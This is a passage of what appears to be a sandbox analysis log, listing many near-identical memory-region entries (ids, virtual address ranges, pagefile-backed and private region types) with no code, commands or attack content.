"pagefile_0x0000000002880000" filename = "" Region: id = 19666 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19667 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19668 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19669 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19670 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19671 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19672 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19673 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19674 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19675 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19676 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19677 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19678 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19679 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19680 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19681 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19682 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19683 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19684 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19685 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19686 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19687 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19688 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19689 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19690 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19691 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19692 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19693 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19694 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19695 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19696 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19697 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19698 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19699 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19700 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19701 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19702 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19703 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19704 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19705 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19706 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19707 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19708 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19709 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19710 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19711 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19712 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19713 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19714 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19715 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19716 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19717 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19718 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19719 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19720 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19721 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19722 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19723 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19724 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19725 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19726 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19727 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19728 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19729 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19730 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19731 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19732 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19733 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19734 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19735 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19736 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19737 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 19738 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 19739 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19740 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19741 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19742 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19743 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19744 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19745 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19746 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19747 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19748 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19749 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19750 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19751 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19752 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19753 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19754 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19755 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19756 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19757 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19758 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19759 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19760 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19761 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19762 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19763 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19764 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19765 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19766 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19767 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19768 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19769 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19770 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19771 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19772 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19773 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19774 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19775 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19776 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19777 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19778 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19779 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19780 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19781 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19782 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19783 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19784 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19785 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19786 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19787 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19788 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19789 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19790 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19791 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19792 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19793 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19794 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19795 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19796 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19797 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19798 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19799 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19800 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19801 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19802 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19803 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19804 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19805 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19806 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19807 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19808 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19809 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19810 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19811 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19812 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19813 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19814 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19815 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19816 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19817 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19818 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19819 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19820 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19821 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19822 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19823 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19824 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19825 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19826 start_va = 0x4140000 end_va = 0x4140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 19827 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19828 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19829 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19830 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19831 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19832 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19833 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19834 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19835 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19836 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19837 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19838 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19839 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19840 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19841 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19842 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19843 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19844 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19845 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19846 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19847 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19848 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 19849 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 19850 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19851 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19852 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19853 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 